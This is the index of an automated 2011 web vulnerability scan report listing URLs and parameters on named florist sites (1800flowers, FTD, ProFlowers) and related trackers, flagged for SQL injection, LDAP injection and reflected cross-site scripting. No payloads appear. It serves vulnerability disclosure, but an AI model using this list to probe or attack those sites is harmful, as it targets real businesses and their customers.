XSS, Open Redirection, Insecure Configuration, CWE-79, CAPEC-86, DORK, GHDB, 05092011-01

Hoyt LLC Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

Report generated by XSS.CX at Mon May 09 07:41:14 CDT 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

Loading

1. SQL injection

1.1. http://recs.richrelevance.com/rrserver/p13n_generated.js [REST URL parameter 1]

1.2. http://recs.richrelevance.com/rrserver/p13n_generated.js [REST URL parameter 1]

1.3. http://ww30.1800flowers.com/deliverycalendarnew.do [month parameter]

1.4. http://ww30.1800flowers.com/product.do [CMAVID cookie]

1.5. http://ww30.1800flowers.com/shoppingbasket.do [brandCode cookie]

1.6. https://ww30.1800flowers.com/checkoutsignin.do [Referer HTTP header]

1.7. http://www.ftd.com/350/favicon.ico [REST URL parameter 1]

1.8. http://www.ftd.com/350/favicon.ico [REST URL parameter 2]

1.9. http://www.ftd.com/350/v20110407/ftd.css [REST URL parameter 1]

1.10. http://www.ftd.com/350/v20110407/ftd.css [REST URL parameter 2]

1.11. http://www.ftd.com/350/v20110407/ftd.css [REST URL parameter 3]

1.12. http://www.ftd.com/351 [REST URL parameter 1]

1.13. http://www.ftd.com/351/favicon.ico [REST URL parameter 1]

1.14. http://www.ftd.com/351/favicon.ico [REST URL parameter 2]

1.15. http://www.ftd.com/351/v20110407/ftd.css [REST URL parameter 1]

1.16. http://www.ftd.com/351/v20110407/ftd.css [REST URL parameter 2]

1.17. http://www.ftd.com/351/v20110407/ftd.css [REST URL parameter 3]

1.18. http://www.ftd.com/empty/index.epl [REST URL parameter 1]

1.19. http://www.ftd.com/empty/index.epl [REST URL parameter 2]

1.20. http://www.ftd.com/empty/tealeaf.epl [REST URL parameter 1]

1.21. http://www.ftd.com/empty/tealeaf.epl [REST URL parameter 2]

1.22. http://www.ftd.com/pics/counter.gif [REST URL parameter 1]

1.23. http://www.ftd.com/pics/counter.gif [REST URL parameter 2]

1.24. http://xcdn.xgraph.net/17572/ai/xg.gif [REST URL parameter 1]

2. LDAP injection

2.1. http://blooms.1800flowers.com/cm [ci parameter]

2.2. http://www.ftd.com/ [TLTSID cookie]

3. XPath injection

4. Cross-site scripting (reflected)

4.1. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/8inwoodtaper_tn [REST URL parameter 9]

4.2. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/8inwvnbskt_tn [REST URL parameter 9]

4.3. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ACC_purpletrumpet_VA0211_11_SQ [REST URL parameter 9]

4.4. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BBMflowers09_3months_PF [REST URL parameter 9]

4.5. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BBMflowers09_6months_PF [REST URL parameter 9]

4.6. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BBMflowers_12monthsXMAS_PF [REST URL parameter 9]

4.7. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BBMplants09_12months_PF [REST URL parameter 9]

4.8. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BBMplants09_3months_PF [REST URL parameter 9]

4.9. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BBMplants09_6months_PF [REST URL parameter 9]

4.10. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BLB6indaffodills_nestbskt10_2_PF [REST URL parameter 9]

4.11. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BLB7ineastergarden_yelwatercan09_PF [REST URL parameter 9]

4.12. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BLB7inhollmix_honeywvn09_PF [REST URL parameter 9]

4.13. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BLBlilyofvly_bluesquare11_PC1489_PF [REST URL parameter 9]

4.14. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/CAReaster_pnk10_PF [REST URL parameter 9]

4.15. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/CONT215_BRR10006_MDay_11_PF [REST URL parameter 9]

4.16. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/CONTR205_BRR10012_MDay_11_PF [REST URL parameter 9]

4.17. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/COO_SCOSPRBITBOX_BitesBx_MDY_11_FC_SQ [REST URL parameter 9]

4.18. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ContempoVase_tn [REST URL parameter 9]

4.19. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/DIP_BRR10006_BerryTestFancy6v2_GEN_11_SQ [REST URL parameter 9]

4.20. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/DIP_BRR10006_CAK72203_BerryTestFancy6CheeseTrio_GEN_11_PF [REST URL parameter 9]

4.21. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/DIP_BRR10006_CAK72203_BerryTestFancy6CheeseTrio_GEN_11_SQ [REST URL parameter 9]

4.22. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/DIP_BRR10012_BerryTestFancy12_GEN_11_PF [REST URL parameter 9]

4.23. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/DIP_BRR10012_BerryTestFancy12_GEN_11_SQ [REST URL parameter 9]

4.24. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/DIP_BRR30112_Mday12_MDY_11_BS_PF [REST URL parameter 9]

4.25. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/F08_311626_PF [REST URL parameter 9]

4.26. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FD08_149362_W_2_PF [REST URL parameter 9]

4.27. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FRS_CKMCHEERSMOM_Cheers_SPR_11_SQ [REST URL parameter 9]

4.28. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FRS_CKMCLASSIC3_ClassicFruitPlus3_SPR_11_SQ [REST URL parameter 9]

4.29. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FRS_CKMCMFFAVBKT_CmfFavsBsk_GEN_10_SQ [REST URL parameter 9]

4.30. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FRS_CKMCMTREASBK_CmfTreasuresBsk_GEN_10_SQ [REST URL parameter 9]

4.31. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FRS_CKMGORMETVAR_GourmVarBsk_GEN_10_SQ [REST URL parameter 9]

4.32. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FRS_CXMCMFAV_CMFFavBx_GEN_10_SQ [REST URL parameter 9]

4.33. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FRS_CXMONESWTMIX_OneSwetMixBx_GEN_10_SQ [REST URL parameter 9]

4.34. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FRT_CKFFRUIT_Fruitasia_GEN_10_SQ [REST URL parameter 9]

4.35. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/GAR8inwhitegarden_bskt10_PC1845_PF [REST URL parameter 9]

4.36. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/GingerVase_tn [REST URL parameter 9]

4.37. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/IRS20assrt10_PF [REST URL parameter 9]

4.38. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/IRS20blue_gv11_PF [REST URL parameter 9]

4.39. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/KiwiPineapleFOTMSav_m [REST URL parameter 9]

4.40. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/LLYassrtories4_pnk10_PF [REST URL parameter 9]

4.41. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/LLYassrtperu_pnk10_TEST_PF [REST URL parameter 9]

4.42. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/LLYdlxassrtories_pnk11_PF [REST URL parameter 9]

4.43. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/LLYdlxassrtperu_tv11_PF [REST URL parameter 9]

4.44. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/LLYdlxstargazer_pnk11_PF [REST URL parameter 9]

4.45. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/LLYroyalspring_pnk10_PF [REST URL parameter 9]

4.46. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/M519BRR1001210_SQ [REST URL parameter 9]

4.47. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQ15orchpurp10_PF [REST URL parameter 9]

4.48. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQallthefrills_pnk11_PF [REST URL parameter 9]

4.49. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQassrtgerb_coralpeony11_PF [REST URL parameter 9]

4.50. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQassrtmums11_catalog_PF [REST URL parameter 9]

4.51. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQcarnival10_PF [REST URL parameter 9]

4.52. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQdlxhugskiss_rbyg11_PF [REST URL parameter 9]

4.53. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQdlxjoyfulbouquet09_PF [REST URL parameter 9]

4.54. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQdlxpinksapp_pnk10_2_PF [REST URL parameter 9]

4.55. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQdlxpurelyspec_purpletrmp11_PF [REST URL parameter 9]

4.56. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQdlxsprngblms_pnk11_2_PF [REST URL parameter 9]

4.57. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQgardenbouquet_grn11_PF [REST URL parameter 9]

4.58. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQhugskisses_rbye11_PF [REST URL parameter 9]

4.59. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQjoyfulbouquet_pnk10_PF [REST URL parameter 9]

4.60. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQnewspringdays_grn10_3_PF [REST URL parameter 9]

4.61. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQpinksapp_pnk11_catalog_PF [REST URL parameter 9]

4.62. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQpurelyspec_grn10_PF [REST URL parameter 9]

4.63. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQpurppetals11_PF [REST URL parameter 9]

4.64. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQspringblooms_pnk09_CONTROL_PF [REST URL parameter 9]

4.65. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQspringcarnspoms11_PF [REST URL parameter 9]

4.66. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQspringmix11_PF [REST URL parameter 9]

4.67. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQsprngawake09_PF [REST URL parameter 9]

4.68. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQtruspec_pnk10_3_PF [REST URL parameter 9]

4.69. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MRS_BSK_EDY08_BitesBsk_SQ [REST URL parameter 9]

4.70. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MRS_BSK_EDY08_ClscCrate_SQ [REST URL parameter 9]

4.71. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/Mdaycard10_AC [REST URL parameter 9]

4.72. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/OCC_CKGSPAGRDN_RoseSpaV2_GEN_10_S10_SQ [REST URL parameter 9]

4.73. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/OCC_CKGSPAPROV_LavSpaV2_GEN_10_S10_PF [REST URL parameter 9]

4.74. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/OCC_CKGSPAPROV_LavSpaV2_GEN_10_S10_SQ [REST URL parameter 9]

4.75. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORC3inbaby_tcuppnk09_Vday__ASPM_CNTRL_PF [REST URL parameter 9]

4.76. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORC6indblpurpphal_blktin09_PF [REST URL parameter 9]

4.77. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORC6indblwhtphal_willow09_PF [REST URL parameter 9]

4.78. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORC6inphaltilandsia_curn09_l [REST URL parameter 9]

4.79. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORCbromgrdnblk07_PF [REST URL parameter 9]

4.80. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORCdblbromgardn09_PF [REST URL parameter 9]

4.81. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORCdblkalblktin08_2_PF [REST URL parameter 9]

4.82. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORCdblorchidheart_silvervasepink11_PC1936_PF [REST URL parameter 9]

4.83. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORCwhtphalylwbrom07_PF [REST URL parameter 9]

4.84. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0026339b [REST URL parameter 9]

4.85. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0049189b [REST URL parameter 9]

4.86. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0054324b [REST URL parameter 9]

4.87. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0055092b [REST URL parameter 9]

4.88. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0063828b [REST URL parameter 9]

4.89. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0065857b [REST URL parameter 9]

4.90. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0071881 [REST URL parameter 9]

4.91. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0073650b [REST URL parameter 9]

4.92. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0085988b [REST URL parameter 9]

4.93. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0087026b [REST URL parameter 9]

4.94. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0102761b [REST URL parameter 9]

4.95. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000007G437_68702_W1_SQ [REST URL parameter 9]

4.96. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000008345X_49771_W1_SQ [REST URL parameter 9]

4.97. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000009D282_88198_W1_SQ [REST URL parameter 9]

4.98. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000009G877_92524_W1_SQ [REST URL parameter 9]

4.99. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000010D01X_103184_W1 [REST URL parameter 9]

4.100. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000010D946_103270_W1 [REST URL parameter 9]

4.101. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_0000007G150X_68104_W1_SQ [REST URL parameter 9]

4.102. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_0000007H4854_70842_W1_SQ [REST URL parameter 9]

4.103. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_00000001125X_023117_W1_SQ [REST URL parameter 9]

4.104. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_00000009D209_087948_W1_SQ [REST URL parameter 9]

4.105. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_0000009D183X_087921_W1 [REST URL parameter 9]

4.106. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PF_11_00000000M232_VA0606_W1_PF [REST URL parameter 9]

4.107. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PF_11_00000000M519_VA0606_W1_PF [REST URL parameter 9]

4.108. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PF_11_00000000R212_VA1137_W1_FVFC_PF [REST URL parameter 9]

4.109. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PF_11_00000000R212_VA1137_W1_PF [REST URL parameter 9]

4.110. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT4incampanula_dblbskt09_PF [REST URL parameter 9]

4.111. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT4inmoneytree_lotus09_PF [REST URL parameter 9]

4.112. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT4insucculent_4inbamboopot10_PC1449_PF [REST URL parameter 9]

4.113. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT4inyelkalanchoe_beefelt11_PC1859_PF [REST URL parameter 9]

4.114. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6incallapnk_victin11_PC1601_PF [REST URL parameter 9]

4.115. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6indkpnkazalea_sqbsktgrn10_PF [REST URL parameter 9]

4.116. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6ingard_victin11_PC1601_2_PF [REST URL parameter 9]

4.117. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6ingardtop_fpc08_PF [REST URL parameter 9]

4.118. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inhydblu_sqbsktgrn10_PF [REST URL parameter 9]

4.119. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inltpnkrosalea_victin10_PF [REST URL parameter 9]

4.120. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inpinkros_ltbskt10_PC0841PB_PF [REST URL parameter 9]

4.121. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inpnkanthur_sqwht09_l [REST URL parameter 9]

4.122. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inpnkazaleatop_urn08bud_PF [REST URL parameter 9]

4.123. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inpnkroseblucampanula_victin10_2_PF [REST URL parameter 9]

4.124. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inpurpazalea_sqbsktgrn09_PF [REST URL parameter 9]

4.125. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inredrose_dkbsktrb09CAT_PF [REST URL parameter 9]

4.126. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inrosylwurn_victin10_PF [REST URL parameter 9]

4.127. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6insucculent_zinc09_l [REST URL parameter 9]

4.128. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inwhtazalea_crmurn11_PC1080_PF [REST URL parameter 9]

4.129. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT8inspath_wdtpr09_l [REST URL parameter 9]

4.130. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT_8inwhpot_PC1795_SQ [REST URL parameter 9]

4.131. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLTangeltree10_PF [REST URL parameter 9]

4.132. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLTazaleabons10_bloom_PF [REST URL parameter 9]

4.133. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLTgdnabonsai2_PF [REST URL parameter 9]

4.134. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLThibiscus_dkbsktyel09_l [REST URL parameter 9]

4.135. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLThrtbmboo_pinkceramic11_PC1939_PF [REST URL parameter 9]

4.136. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLTluckybamboo_chinesetakeout11_PC1858_PF [REST URL parameter 9]

4.137. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLUMdayBearGodiva_FCB_PF [REST URL parameter 9]

4.138. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS12red50_rbye11_PF [REST URL parameter 9]

4.139. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS24assorted50_grn10_PF [REST URL parameter 9]

4.140. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS24assrt_pnk11_2_FVFC_PF [REST URL parameter 9]

4.141. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS24assrt_pnk11_2_PF [REST URL parameter 9]

4.142. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS24assrtpet_grn10_PF [REST URL parameter 9]

4.143. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS24red40_rbye10_2_PF [REST URL parameter 9]

4.144. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS_PAS_pinkbicolor_11pm_catalog_PF [REST URL parameter 9]

4.145. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SHB_EDY07_Berry24_PF [REST URL parameter 9]

4.146. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SHB_EDY09_BRR10106_1 [REST URL parameter 9]

4.147. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SHB_EDY09_BRR10112_1 [REST URL parameter 9]

4.148. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SNK_CKGCHEESBRD_CheeseSnkBrd_GEN_10_SQ [REST URL parameter 9]

4.149. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SNK_CKNMDAYROSE_MomFrtFlwr_MDY_11_SQ [REST URL parameter 9]

4.150. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SNK_CKNSNCKCHC_SnkAttkv2_Core_10_SQ [REST URL parameter 9]

4.151. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SNK_CONSSTRTTWR_GvnSpringTower_SPR_11_SQ [REST URL parameter 9]

4.152. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SNK_PUS1441_SwtTwr_EDY_11_SQ [REST URL parameter 9]

4.153. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SUN10yellowfill_pnk11_PF [REST URL parameter 9]

4.154. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL15assrt_sgv09_PF [REST URL parameter 9]

4.155. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL20assrt_grn10_test_PF [REST URL parameter 9]

4.156. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL30assrt_tv11_catalog_PF [REST URL parameter 9]

4.157. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL30purple_purpletrmp11_PF [REST URL parameter 9]

4.158. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TropOrgSmplrPF_l [REST URL parameter 9]

4.159. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/WRTherbal09book_m [REST URL parameter 9]

4.160. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/WRTlavendarluxe_PF [REST URL parameter 9]

4.161. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/WRTremembrance09_l [REST URL parameter 9]

4.162. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/WRTsympathy_l [REST URL parameter 9]

4.163. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/accgenblue09_tn [REST URL parameter 9]

4.164. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/p0007703b [REST URL parameter 9]

4.165. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/p0074868b [REST URL parameter 9]

4.166. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/p0084749b [REST URL parameter 9]

4.167. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/palepink_tn [REST URL parameter 9]

4.168. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/summerchocolates08_tn [REST URL parameter 9]

4.169. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/zinc08_tn [REST URL parameter 9]

4.170. http://dms.netmng.com/si/CM/Tracking/ClickTracking.aspx [u parameter]

4.171. https://orders.proflowers.com/OrderProcess/(S(0v3osigpapgykefj2x3bhrjp))/GiftOptions.aspx [trackingpgroup parameter]

4.172. https://orders.proflowers.com/OrderProcess/(S(0v3osigpapgykefj2x3bhrjp))/Order.aspx [trackingpgroup parameter]

